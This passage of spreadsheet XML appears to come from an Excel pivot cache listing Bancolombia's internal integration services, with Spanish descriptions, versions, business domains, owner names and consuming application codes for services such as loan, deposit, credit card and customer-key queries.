    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="MQ y Broker"/>
    <s v="Servicios e Integració​​​​​​​​​​​​​​n"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="                                             "/>
    <s v="STI _x000d__x000a_AW1123001 _x000d__x000a_GDE _x000d__x000a_TP _x000d__x000a_Allus"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Fiscal Y Parafiscal Del Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite la consulta de la información usada dentro de los aportes de a la planilla de seguridad social (PILA), información entregada por ACH con su producto SOI-DATA, lo que permite tener datos del Cliente como su salario básico actual, los detalles de empresa donde trabaja el cliente consultado, si se encuentra activo como empleado, el ingreso de la base de cotización de pensión, salud y caja de compensación. Información que permitiría revisar el estado actual salarial y de su empresa. "/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="ACH"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Fondos Fiduciarios"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio tiene como alcance realizar las consultas de los movimientos fiduciarios como Adiciones, cancelaciones, retiros y adiciones entre fondos de inversión colectiva, al igual que aquellos movimientos históricos, y del portafolio que se tiene con el producto InvesBot."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Framework Servicios Fiduciaria_ISFSF0001"/>
    <s v="AW1187001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Prestamos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite consultar los préstamos que tiene un cliente, consultar los prestamos que tiene un convenio empresarial, consultar el detalle y los movimientos de un préstamo en particular. "/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW1294001 _x000d__x000a_AW0360007"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Prestamos"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite consultar los préstamos que tiene un cliente, consultar los prestamos que tiene un convenio empresarial, consultar el detalle y los movimientos de un préstamo en particular. "/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW1313 _x000d__x000a_AW1294001 _x000d__x000a_AW1272001 _x000d__x000a_AW0360007 _x000d__x000a_AW1170 _x000d__x000a_AW0955 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW0955001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Prestamos"/>
    <n v="210"/>
    <s v="No Aplica"/>
    <s v="El servicio expone métodos que hacen posible la consulta de información general de préstamos a partir de datos de identificación del titular o convenio empresarial, así como consultas de movimientos y de detalles de una obligación crediticia."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW1313 _x000d__x000a_AW1294001 _x000d__x000a_AW1272001 _x000d__x000a_AW0360007 _x000d__x000a_AW1170 _x000d__x000a_AW0955 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW0955001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Recaudos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio realizara las consultas requeridas con todos lo relacionado con Recaudos: la consulta de listas de convenios, consulta histórico de recaudos, consulta del detalle de los convenios, consulta del histórico de pagos, consulta de pagadores inscritos, consulta de las oficinas habilitadas y consulta de histórico de la programación del débito automático."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="ALM _x000d__x000a_SVP _x000d__x000a_GDE _x000d__x000a_APP _x000d__x000a_PSE _x000d__x000a_SVE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Tarjeta Credito"/>
    <n v="110"/>
    <s v="No Aplica"/>
    <s v="El servicio consulta información tarjeta crédito, traerá todas las tarjetas activas principales que tiene el cliente asociado a una o varias cuentas (crédito visa cayman)."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Tarjeta Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v=" Servicio que permite realizar las diferentes consultas de la información de tarjetas de crédito, donde se podrá retornar información de campos de estados, saldos, deudas y fechas de la tarjeta que se pueden exponer a nivel de los clientes._x005f_x000D_ _x005f_x000D_ Este servicio está construido para poder brindar servicios de consulta de información de las tarjetas de crédito a los clientes; esto en el contexto funcional de la línea de negocio de Tarjetas (Producto de Bancolombia)."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="APIC _x000d__x000a_AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Token SVE"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite que se realicen consultas al proveedor Todo1 sobre los tokens físicos que han sido asignados a los clientes empresas del Grupo Bancolombia."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="MQ y Broker"/>
    <s v="Servicios e Integració​​​​​​​​​​​​​​n"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Todo 1"/>
    <s v="STI _x000d__x000a_AW0922 _x000d__x000a_GDE _x000d__x000a_TP _x000d__x000a_Allus"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Inversiones"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio tiene como propósito consultar la información que se encuentra asociada a producto de deposito virtual , cuenta con operaciones para consulta de tasas, listado de CDT's y detalle de CDT"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <m/>
    <m/>
    <s v="CDT _x000d__x000a_NU0014001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_SVE _x000d__x000a_AW0955001 _x000d__x000a_NU0153001 _x000d__x000a_NU0146001 _x000d__x000a_NU0149001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Limites De Endeudamiento"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Versión Inicial del Servicio Consulta Limites de Endeudamiento para la EVC Ciclo de Crédito"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_APICONNECT"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Listas De Control"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio tiene la capacidad de consultar a un cliente en una categoría y subcategoría de listas de control. El cliente puede ser persona Natural o Jurídica. Este servicio no contempla el retiro de clientes de estas listas."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="BVC-Legados_Clientes legados_ISBVC0011"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Listas De Control"/>
    <n v="110"/>
    <s v="No Aplica"/>
    <s v="Este servicio tiene como alcance consultar el estado de un cliente en listas de control"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="BVC-Legados_Clientes legados_ISBVC0011"/>
    <s v="AW1177 _x000d__x000a_AW1373 _x000d__x000a_SLT _x000d__x000a_AW0856 _x000d__x000a_AW1294001 _x000d__x000a_NU0129001 _x000d__x000a_AW1176 _x000d__x000a_AW1285001 _x000d__x000a_AW1206001 _x000d__x000a_AW1258001 _x000d__x000a_AW1170 _x000d__x000a_AW1281002 _x000d__x000a_NU0034001 _x000d__x000a_AW0638 _x000d__x000a_AW0922 _x000d__x000a_AW1302001 _x000d__x000a_AW1203001 _x000d__x000a_NU0017001 _x000d__x000a_AW0998 _x000d__x000a_AW1258011 _x000d__x000a_AW1258002 _x000d__x000a_AW0360009 _x000d__x000a_NU0064001 _x000d__x000a_AW1097001 _x000d__x000a_AW0683001 _x000d__x000a_NU0142001 _x000d__x000a_NU0143001 _x000d__x000a_AW1011 _x000d__x000a_AW1281003 _x000d__x000a_AW1128 _x000d__x000a_NU0139001 _x000d__x000a_NU0035001 _x000d__x000a_AW1311 _x000d__x000a_AW1183001 _x000d__x000a_AW1315014 _x000d__x000a_AW1081001 _x000d__x000a_NU0163001 _x000d__x000a_AW1151001 _x000d__x000a_AW0682001 _x000d__x000a_AW1333002 _x000d__x000a_AW1279001 _x000d__x000a_AW1277001 _x000d__x000a_AW1365 _x000d__x000a_AW0434001 _x000d__x000a_NU0063001 _x000d__x000a_NU0135001 _x000d__x000a_AW0661003 _x000d__x000a_NU0046001 _x000d__x000a_AW1480001 _x000d__x000a_AW0629001 _x000d__x000a_AW0955001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Llavero Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Llavero Cliente, es un servicio que permite consultar una llave de identificación especifica del cliente según una identificación de entrada. Es decir, que de un tipo y número de identificación puedo obtener la llave MDM del cliente o en otro caso, a partir de la llave MDM puedo consultar cual es la llave CIF. Permite consultar la llave específica a partir de: la llave MDM, llave CIF, llave CRM y el tipo/número de identificación. Y las llaves resultantes pueden ser: la llave MDM, llave CIF, llave CRM. Esta información que retornar el servicio corresponde a datos maestros de los clientes de Colombia."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW0748001 _x000d__x000a_AW1240001 _x000d__x000a_AW1281002 _x000d__x000a_NU0032001 _x000d__x000a_NU0021001 _x000d__x000a_AW1074001 _x000d__x000a_SVP _x000d__x000a_NU0038001 _x000d__x000a_NU0014001 _x000d__x000a_AW1165 _x000d__x000a_AW1281003 _x000d__x000a_AW1011 _x000d__x000a_NU0035001 _x000d__x000a_AW1218001 _x000d__x000a_AW0661003"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Llavero Comercial"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio: Consulta Llavero Comercial, es un servicio que permite consultar información de las llaves de los empleados comerciales del banco que manejan atención al cliente. Esta información son llaves de los sistemas donde se encuentra el empleado, tal como CIF y CRM. Algunos de los datos que retorna el servicio son: llave empleado CRM, llave empleado CIF (EM), llave MDM del empleado como cliente, llave CRM del empleado como cliente, llave CIF del empleado como cliente, tipo y número de documento original del empleado, entre otros.  Un empleado de atención al cliente puede llegar a ser por ejemplo un gerente comercial o Trader de un cliente."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW1074001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Llaves Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite que, con el tipo y número de documento de un cliente de filiales del exterior, se pueda consultar el valor de la llave CRM o las llaves Finacle de dicho cliente. Las filiales del exterior pueden ser: Bancolombia Panamá, Bancolombia Puerto Rico y Cayman. Un cliente en filiales del exterior puede tener una llave CRM, pero a su vez puede tener varias llaves Finacle, ya que, si el cliente se encuentra en varias filiales, entonces tendrá una llave Finacle por filial."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW0842001 _x000d__x000a_AW1074001 _x000d__x000a_AW1185001 _x000d__x000a_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Lme Finacle Filiales"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio ConsultaLmeFinacleFiliales permite la consulta de Límite Máximo de Endeudamiento de un cliente con operaciones específicas en Finacle de Filiales del Exterior."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="_x000a__x000a_Finacle - F.E_Panama_AW0709001"/>
    <s v="AW1176"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Lme Finacle Trade"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio ConsultaLmeFinacleTrade permite la consulta de Límite Máximo de Endeudamiento de un cliente con operaciones específicas en Finacle Trade Colombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="CIB_ISCIB0001"/>
    <s v="AW1176 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Lme Leasing"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El alcance del servicio consiste en la consulta por numero de identificación, de información desagregada correspondiente al limite Maximo de endeudamiento de un cliente Leasing."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <s v="Delfin Web_menú de módulos_AW0748001"/>
    <s v="AW1176 _x000d__x000a_AW0922"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Lotes De Pago"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Lotes de Pago permitirá conocer la información de los lotes cargador por un cliente pagador. Contiene la información de los encabezados de los archivos que han sido cargados en los últimos tres meses con diferentes opciones de filtro. La información siempre deberá ser consultada a partir de un rango de fechas, cuenta pagadora e información del lote como su monto, tipo de pago o canal por el que fue cargado. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0153001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Marcaciones Personas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite realizar la consulta de las marcaciones de las cuentas que una persona tiene en CIFIN, partiendo del número de identificación, tipo de Identificación, código Producto y motivo Consulta se retorna los datos generales del cliente, el estado de la cuenta (producto) y los demás campos correspondientes a la marcación de cuenta por GMF o por CATS."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="TransUnion"/>
    <s v="AW1227001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Metadata Documental"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Metadata Documental permitirá a los consumidores realizar consultas, para determinar la existencia o no de documentos al interior del grupo Bancolombia y así evitar, solicitarles a los clientes estos documentos._x005f_x000D_ El servicio está pensado para mostrarle a los consumidores información relevante sobre los documentos tales como: tipo del documento, subtipo del documento, dueño del documento, fecha de indexación del documento entre otros, adicionalmente permite elegir la opción de visualizar o no un link donde los documentos consultados pueden ser descargados, este servicio devuelve 0 o muchos documentos de acuerdo a los filtros que se realicen sobre este."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Oracle ECM_UCM - Universal Content Management_AW0494001"/>
    <s v="AW1176 _x000d__x000a_AW0638 _x000d__x000a_AW1272001 _x000d__x000a_NU0001 _x000d__x000a_AW1133 _x000d__x000a_AW0659 _x000d__x000a_AW1203001 _x000d__x000a_NU0142001 _x000d__x000a_AW1218001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Mmf Factoring"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El alcance del servicio consiste en la consulta por numero de identificación, de datos correspondientes al monto máximo de factorura de un cliente Factoring."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Factoring"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Factoring"/>
    <s v="Lucas Daniel Betancourt"/>
    <m/>
    <s v="Sucursal Virtual_Sucursal Virtual Factoring_AW0422001"/>
    <s v="AW1176"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Modificacion Endeudamiento"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio de Consulta Modificaciones Endeudamiento nos brindará la capacidad con su modalidad, tipo y numero de identificación nos diga para que producto se le podrá aplicar modificación, validando así el vector mora, calificación y marca 026."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="AW01010 _x000d__x000a_AW0748001 _x000d__x000a_SUF _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_BVL _x000d__x000a_AW1010001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Motivos Transaccion"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permite en el proceso de compra y venta de divisas consultar los posibles motivos de la transacción."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Movimiento Cuenta Ahorro Deposito"/>
    <n v="110"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Movimiento Cuenta Ahorro Deposito tiene como objetivo realizar las consultas de los Movimientos de las cuentas depósitos (Cuenta Ahorro) de manera genérica, de los clientes pertenecientes a la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <m/>
    <s v="AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Movimiento Cuenta Ahorro Deposito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Movimiento Cuenta Ahorro Deposito tiene como objetivo realizar las consultas de los Movimientos de las cuentas depósitos (Cuenta Ahorro) de manera genérica, de los clientes pertenecientes a la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Depositós"/>
    <s v="AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Movimiento Cuenta Corriente Deposito"/>
    <n v="110"/>
    <s v="No Aplica"/>
    <s v="El servicio tiene como objetivo realizar las consultas de los Movimientos de las cuentas depósitos (Cuenta Corriente) de manera genérica, de los clientes pertenecientes a la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Depositós"/>
    <s v="AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Movimiento Cuenta Corriente Deposito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio tiene como objetivo realizar las consultas de los Movimientos de las cuentas depósitos (Cuenta Corriente) de manera genérica, de los clientes pertenecientes a la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Depositós"/>
    <s v="AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Movimiento Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio ConsultaMovimientoDepositos V.1.0 tiene como objetivo realizar las consulta de los Movimientos de las cuentas depósitos (Cuenta Ahorro y Corriente) de los clientes pertenecientes a la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Depósitos (Cuentas Corriente y de Ahorro) Personalizacion_ISBVD0001"/>
    <s v="AW1272001 _x000d__x000a_NU0010001 _x000d__x000a_AW1218001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Movimientos Bolsillos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Bolsillos Bancolombia permite separar los recursos de una cuenta de ahorros para mantener diferentes ahorros en bolsillos separados con una meta en específico, por ejemplo, ahorros para viajes, salud, alimentación, transporte etc.  El servicio ConsultaMovimientosBolsillos habilita las capacidades de consulta relacionada con los movimientos que puede tener un bolsillo en particular, por ejemplo, adiciones, retiros o transferencias."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0021001 _x000d__x000a_NU0146001 _x000d__x000a_NU0149001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Movimientos Tarjeta Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
